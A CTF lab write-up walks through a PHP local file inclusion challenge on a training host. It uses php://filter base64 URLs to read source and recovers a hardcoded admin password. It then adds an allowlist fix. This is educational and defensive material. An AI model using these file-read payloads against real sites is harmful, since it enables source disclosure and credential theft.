Simple Web 0x08(Lab - My First Meow Website)

tags: NTUSTWS CTF Web
  • Challenge: http://h4ck3r.quest:8400/
  • Target: Login as Admin

Background

Exploit

  1. Observe: The URL, http://h4ck3r.quest:8400/?page=inc/home, takes a file path in the page parameter, so it might have an LFI problem.
  2. Use php://filter to read the page source
    • http://h4ck3r.quest:8400/?page=php://filter/convert.base64-encode/resource=inc/home

    source code

     <!DOCTYPE html>
     <html lang="en">
    
     <head>
         <meta charset="UTF-8">
         <meta http-equiv="X-UA-Compatible" content="IE=edge">
         <meta name="viewport" content="width=device-width, initial-scale=1.0">
         <title>Meow</title>
         <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.9.2/css/bulma.min.css">
     </head>
    
     <body>
         <nav class="navbar is-dark" role="navigation" aria-label="main navigation">
             <div class="navbar-brand">
                 <a class="navbar-item" href="/?page=inc/home">🐱</a>
             </div>
    
             <div id="navbarBasicExample" class="navbar-menu">
                 <div class="navbar-start">
                     <a class="navbar-item" href="/?page=inc/home">
                         Home
                     </a>
                     <a class="navbar-item" href="/?page=inc/about">
                         About
                     </a>
                     <a class="navbar-item" href="/admin.php">
                         Admin
                     </a>
                 </div>
             </div>
         </nav>
    
         <div class="container" style="margin-top: 1em;">
             <?php
             if (isset($_GET['page']))
                 include($_GET['page'] . ".php");
             else
                 include("inc/home.php");
             ?>
         </div>
     </body>
    
     </html>
    
  3. Observe the page source code: it shows that admin.php is under the / directory.
    • http://h4ck3r.quest:8400/?page=php://filter/convert.base64-encode/resource=admin
     <h1>Admin Panel</h1>
     <form>
         <input type="text" name="username" value="admin">
         <input type="password" name="password">
         <input type="submit" value="Submit">
     </form>
    
     <?php
     $admin_account = array("username" => "admin", "password" => "kqqPFObwxU8HYo8E5QgNLhdOxvZmtPhyBCyDxCwpvAQ");
     if (
         isset($_GET['username']) && isset($_GET['password']) &&
         $_GET['username'] === $admin_account['username'] && $_GET['password'] === $admin_account['password']
     ) {
         echo "<h1>LOGIN SUCCESS!</h1><p>".getenv('FLAG')."</p>";
     }
    
     ?>
    
  4. So the admin password is: kqqPFObwxU8HYo8E5QgNLhdOxvZmtPhyBCyDxCwpvAQ. Then we get the flag!!!
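
For the fix side, here is an added example (not part of the challenge source) of how the `include($_GET['page'] . ".php")` call could be replaced with an allowlist lookup. The function name `resolve_page`, the constants and the sample inputs are assumptions made for illustration; the two allowed pages are the ones linked in the navbar above.

```php
<?php
// Added example: hardened replacement for include($_GET['page'] . ".php").
// The allowlist mirrors the pages linked in the navbar (inc/home, inc/about).

const ALLOWED_PAGES = [
    'inc/home'  => __DIR__ . '/inc/home.php',
    'inc/about' => __DIR__ . '/inc/about.php',
];
const DEFAULT_PAGE = 'inc/home';

/**
 * Map the user-supplied page name to a fixed file path.
 * The input is only ever used as an array key, never as part of a path,
 * so stream wrappers (php://filter/...), "../" sequences and absolute
 * paths cannot reach include().
 */
function resolve_page($requested): ?string
{
    if ($requested === null) {
        return ALLOWED_PAGES[DEFAULT_PAGE];
    }
    // ?page[]=x arrives as an array; reject anything that is not a string.
    if (!is_string($requested)) {
        return null;
    }
    return ALLOWED_PAGES[$requested] ?? null;
}

// Constructed inputs showing what is accepted and what is refused.
$samples = [
    null,
    'inc/about',
    'php://filter/convert.base64-encode/resource=inc/home',
    'admin',
    '../admin',
];
foreach ($samples as $s) {
    $path = resolve_page($s);
    printf("%-55s => %s\n", var_export($s, true), $path === null ? 'rejected (404)' : basename($path));
}

// In index.php, resolve before any HTML is sent:
//   $path = resolve_page($_GET['page'] ?? null);
//   if ($path === null) { http_response_code(404); exit; }
//   include $path;
```

The allowlist closes the source disclosure through `page`, but the plaintext credential in admin.php would still be exposed by any other file-read bug, so it belongs outside the source tree and should be compared as a hash.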